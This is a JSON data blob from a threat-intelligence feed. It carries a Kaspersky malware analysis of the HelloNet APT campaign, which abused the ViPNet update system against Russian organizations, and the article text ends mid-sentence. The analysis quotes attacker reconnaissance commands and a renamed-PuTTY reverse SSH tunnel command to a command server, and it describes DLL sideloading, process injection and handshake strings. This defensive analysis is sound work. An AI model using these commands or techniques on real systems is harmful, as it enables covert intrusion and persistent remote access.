[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f33hV4YCdGx9Jwey-rV1PTDXwhRzHA5A-hqoEcKWvs8Q":3},{"article":4,"iocs":53},{"id":5,"title":6,"slug":7,"summary":8,"ai_summary":9,"brief":10,"full_text":11,"url":12,"image_url":13,"published_at":14,"ingested_at":15,"relevance_score":16,"entities":17,"category_id":32,"category":33,"article_tags":37},"b30d8a7c-1ce4-4b63-a0f8-fd7e91d291ef","HelloNet campaign — new malicious modules launched through the ViPNet update system","hellonet-campaign-new-malicious-modules-launched-through-the-vipnet-update-syste-c70042","We identified targeted infection attempts against large Russian organizations using the ViPNet update system (a software suite for creating secure networks).","Kaspersky identified a new APT campaign called HelloNet that has been active since at least May 2026, targeting large Russian government, energy, transport, education, and logistics organizations. The attack leverages compromised ViPNet update system (secure network software) to deliver three malicious modules: HelloInjector (DLL sideloading loader), HelloProxy (traffic proxy and payload loader), and HelloBackdoor (Rust-based backdoor). The campaign exploits kernel-level IOCTL interception to evade user-mode security solutions.","HelloNet APT campaign targets Russian organizations via ViPNet update system compromise with new malicious modules.","Threat Response Table of Contents Persistence via the update systemHelloInjector — a loader for additional malicious componentsHelloProxy — a tool for traffic proxying and launching new malicious payloadsHelloBackdoor — a Rust-based backdoor for file system manipulationsAttributionRecommendationsDetection by Kaspersky solutionsIndicators of Compromise UPD 16.07.2026: Added detection of the malicious activity using Kaspersky Managed Detection and Response. UPD 16.07.2026: Added detection rules and examples using KEDR Expert. UPD 16.07.2026: Added detection of the malicious campaign in network traffic using Kaspersky Anti Targeted Attack (KATA) with the NDR module. UPD 16.07.2026: Updated the list of Indicators of Compromise (IoCs) and TTPs. We discovered a new APT attack using previously unknown tooling, which started at least in May 2026 and remains active at the time of publication. It is notable in that the implants used during it were launched through the ViPNet update system (a software suite for creating secure networks). During our research, we identified attempts of targeted infection of large Russian organizations from the government, energy, transport, education, and logistics sectors, as well as industry. This is not the first time an advanced group has targeted computers connected to ViPNet networks. For example, last year we discovered a complex backdoor mimicking ViPNet updates. Persistence via the update system On one of the analyzed systems, we identified a malicious file named wtsapi32.dll in the directory C:\\Program Files (x86)\\InfoTeCS\\VIPNet Update System, which belongs to the ViPNet suite update system. By placing the file in this directory, the attackers implement the DLL Sideloading technique — the ViPNet update system executable file itcsrvup64.exe, which is launched at OS startup, is susceptible to it. Thus, during this attack, the attackers tried to implement persistence on the system through the ViPNet software update component. HelloInjector — a loader for additional malicious components The wtsapi32.dll component is a loader, which we named HelloInjector. Its main goal is to inject its code into the svchost.exe process and launch the malicious payload. After launch, the malware checks the process in the context of which it was launched. If the name of the main process is not svchost.exe, the loader starts iterating through all processes running in the operating system. It looks for a process whose name contains the string svchost, and the command line contains the string netsvcs. If such a process is found, the loader injects itself into the target process using the NtWriteVirtualMemory and NtCreateThreadEx functions. After restarting in the new process, the loader checks the process name again for the presence of the string svchost. Having confirmed the successful check, HelloInjector loads and executes the malicious payload in memory, which is stored in its body in plain text. HelloProxy — a tool for traffic proxying and launching new malicious payloads The malicious payload, which we named HelloProxy, is simultaneously a hidden proxy and a loader for the following modules sent by the command server. It works by intercepting the NtDeviceIoControlFile, closesocket, and shutdown functions. Their interception is carried out using the Microsoft Detours library. The handlers of the closesocket and shutdown functions prevent the premature closing of sockets used for interaction with the C2. In turn, the handler of the NtDeviceIoControlFile function contains the main malicious logic. Its code implements the interception of two IOCTL codes: AFD_RECV (0x12017) AFD_GET_TDI_HANDLES (0x12037) These codes are used during socket operations — their interception allows the malware to hinder security solutions operating in user mode for filtering network connections. Kaspersky security solutions detect such activity and prevent infection attempts at all stages. The AFD_GET_TDI_HANDLES handler is responsible for socket registration, and the AFD_RECV handler initiates the processing of incoming traffic. It is worth noting that every incoming message that triggered the processing of the AFD_RECV code is logged to the file C:\\users\\public\\tesh4RPC.txt in the format: threadid: \u003CThread ID> pid=\u003CPID>\\r\\n 1 threadid: \u003CThread ID> pid=\u003CPID>\\r\\n After installing the interceptors, the malware starts listening on ports 5003 and 5060 in anticipation of the first commands from the C2 server. In order to distinguish the command server traffic from the rest of the traffic, the implant implements a handshake process: it sends two bytes 0x0502 through the socket and expects to receive a message containing the string ASDFASFSAFASDF. After the successful completion of the handshake, the processing of incoming commands continues. Depending on the received command, there are two execution branches: Working as a proxy. The malware accepts strings in the following format: \u003Cip_addr>:\u003Cport> 1 \u003Cip_addr>:\u003Cport> Afterwards, it creates new sockets and starts forwarding traffic between them. Working as a loader. The malware accepts an executable file from the command server, after which it loads it into the memory of its own process and launches it in a separate thread. During the research, we managed to discover two malicious payloads that were injected into the svchost process, likely as a result of the previously described loader’s operation: An implant, which we named HelloExecutor, with the help of which attackers can execute commands on the infected system; A module for cleaning ViPNet software log files, which we named HelloCleaner. It allows hiding the attackers’ actions in the system. We established that the HelloExecutor backdoor was used for reconnaissance in the networks of infected organizations. The following shell commands were executed: query user ipconfig \u002Fall ping 8.8.8.8 -n 1 net user \u002Fdo net group \u002Fdo dir \"C:\\Program Files (x86)\" dir \"C:\\Program Files (x86)\\infotecs\\\" dir \"C:\\Program Files (x86)\\infotecs\\ViPNet Administrator\" dir \"C:\\Program Files (x86)\\infotecs\\ViPNet Client\\Export\" dir \"C:\\Program Files (x86)\\infotecs\\ViPNet Client\" dir \"С:\\ProgramData\\Infotecs\\ViPNet Administrator\\kc\\Export\\\" dir \"$appdata\\Infotecs\\ViPNet Administrator\\kc\\Export\\ Dst for network \u003Cномер сети удален>\" dir c:\\users\\[username] query user dir C:\\Users\\Public\\music 123456789101112131415 query useripconfig \u002Fallping 8.8.8.8 -n 1net user \u002Fdonet group \u002Fdodir \"C:\\Program Files (x86)\"dir \"C:\\Program Files (x86)\\infotecs\\\"dir \"C:\\Program Files (x86)\\infotecs\\ViPNet Administrator\"dir \"C:\\Program Files (x86)\\infotecs\\ViPNet Client\\Export\"dir \"C:\\Program Files (x86)\\infotecs\\ViPNet Client\"dir \"С:\\ProgramData\\Infotecs\\ViPNet Administrator\\kc\\Export\\\"dir \"$appdata\\Infotecs\\ViPNet Administrator\\kc\\Export\\ Dst for network \u003Cномер сети удален>\"dir c:\\users\\[username]query userdir C:\\Users\\Public\\music In these commands, the mention of the directory C:\\Users\\Public\\Music is notable. We established that on infected machines, the attackers used this directory when launching an SSH tunnel from the infected infrastructure to the attackers’ command server (5.39.253[.]206). The attackers launched a renamed executable file of the legitimate PuTTY utility (a client for various remote access protocols): C:\\users\\public\\music\\frontpage.exe -C -N -R 8443:[redacted]:5003 sftp@5.39.253[.]206 -P 3522 -pw [redacted] 1 C:\\users\\public\\music\\frontpage.exe -C -N -R 8443:[redacted]:5003 sftp@5.39.253[.]206 -P 3522 -pw [redacted] HelloBackdoor — a Rust-based backdoor for file system manipulations In addition to this, a backdoor written in the Rust language, which we named HelloBackdoor, was discovered on one of the infected systems. It accepts connections on port 443, waiting for the string 47c6235b4d2611184 (the second half of the MD5 hash of the string “hello\\n“) to activate the backdoor. This backdoor further accepts the following commands: !upload — upload a file to the infected machine !down — down","https:\u002F\u002Fsecurelist.com\u002Ftr\u002Fhellonet-vipnet\u002F120700\u002F","https:\u002F\u002Fmedia.kasperskycontenthub.com\u002Fwp-content\u002Fuploads\u002Fsites\u002F43\u002F2026\u002F07\u002F16110058\u002Fhellonet3_vipnet_pingpongsuperman_red_digital_computerized_hydra_destroying_comp_aa0b5c86-fb99-48d0-8109-cd57849fabc8-scaled.jpg","2026-07-16T13:05:56+00:00","2026-07-16T16:00:27.867883+00:00",9,[18,21,24,27,29],{"name":19,"type":20},"HelloNet","campaign",{"name":22,"type":23},"ViPNet","product",{"name":25,"type":26},"InfoTeCS","vendor",{"name":28,"type":26},"Kaspersky",{"name":30,"type":31},"Microsoft Detours","technology","6cbdd207-aaa1-4176-9534-e156b125e917",{"id":32,"icon":34,"name":35,"slug":36},null,"Nation-state","nation-state",[38,43,48],{"category":39},{"id":40,"icon":34,"name":41,"slug":42},"26b0b636-0e31-4db1-bffb-61bdf9f20a58","Supply Chain","supply-chain",{"category":44},{"id":45,"icon":34,"name":46,"slug":47},"89f78b1c-3503-45a1-9fc7-e23d2ce1c6d5","Malware","malware",{"category":49},{"id":50,"icon":34,"name":51,"slug":52},"e7b231c8-5f79-4465-8d38-1ef13aea5a14","Threat Intelligence","threat-intelligence",[54,57,60,63],{"type":47,"value":55,"context":56},"HelloInjector","DLL sideloading loader injected into svchost.exe via wtsapi32.dll in ViPNet update directory",{"type":47,"value":58,"context":59},"HelloProxy","Traffic proxy and secondary payload loader using IOCTL interception via Microsoft Detours",{"type":47,"value":61,"context":62},"HelloBackdoor","Rust-based backdoor component for file system manipulation",{"type":47,"value":19,"context":64},"APT campaign name targeting Russian critical infrastructure sectors"]